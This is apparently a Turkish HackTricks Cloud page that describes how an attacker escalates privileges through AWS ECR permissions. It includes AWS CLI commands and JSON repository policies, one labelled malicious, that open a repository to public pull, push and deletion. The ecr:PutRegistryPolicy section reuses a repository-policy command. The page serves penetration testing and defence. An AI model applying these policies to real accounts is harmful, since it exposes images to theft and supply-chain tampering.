AWS - ECR Privesc

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

ECR

`ecr:GetAuthorizationToken`,`ecr:BatchGetImage`

ecr:GetAuthorizationToken ve ecr:BatchGetImage izinlerine sahip bir saldırgan ECR'ye giriş yapabilir ve görüntüleri indirebilir.

Görüntüleri nasıl indireceğiniz hakkında daha fazla bilgi için:

AWS - ECR Post Exploitation

Olası Etki: Trafikteki hassas bilgileri yakalayarak dolaylı ayrıcalık yükseltme.

`ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`

Bu tüm izinlere sahip bir saldırgan ECR'ye giriş yapabilir ve görüntüleri yükleyebilir. Bu, bu görüntülerin kullanıldığı diğer ortamlara ayrıcalıkları yükseltmek için yararlı olabilir.

Yeni bir görüntü yüklemeyi/güncellemeyi öğrenmek için kontrol edin:

AWS - EKS Enum

`ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart`

Önceki bölüm gibi, ancak kamuya açık depolar için.

`ecr:SetRepositoryPolicy`

Bu izne sahip bir saldırgan depo politikasını değiştirerek kendisine (veya hatta herkese) okuma/yazma erişimi verebilir. Örneğin, bu örnekte herkes için okuma erişimi verilmektedir.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

my-policy.json içeriği:

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

`ecr-public:SetRepositoryPolicy`

Önceki bölümdeki gibi, ancak kamuya açık depolar için. Bir saldırgan, ECR Public deposunun depo politikasını değiştirebilir ve yetkisiz kamu erişimi sağlayabilir veya ayrıcalıklarını artırabilir.

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Olası Etki: ECR Public deposuna yetkisiz genel erişim, herhangi bir kullanıcının görüntüleri yüklemesine, çekmesine veya silmesine izin verir.

`ecr:PutRegistryPolicy`

Bu izne sahip bir saldırgan, kayıt politikasını değiştirerek kendisine, hesabına (veya hatta herkese) okuma/yazma erişimi verebilir.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousAWS - EC2 Privesc NextAWS - ECS Privesc

Last updated 3 days ago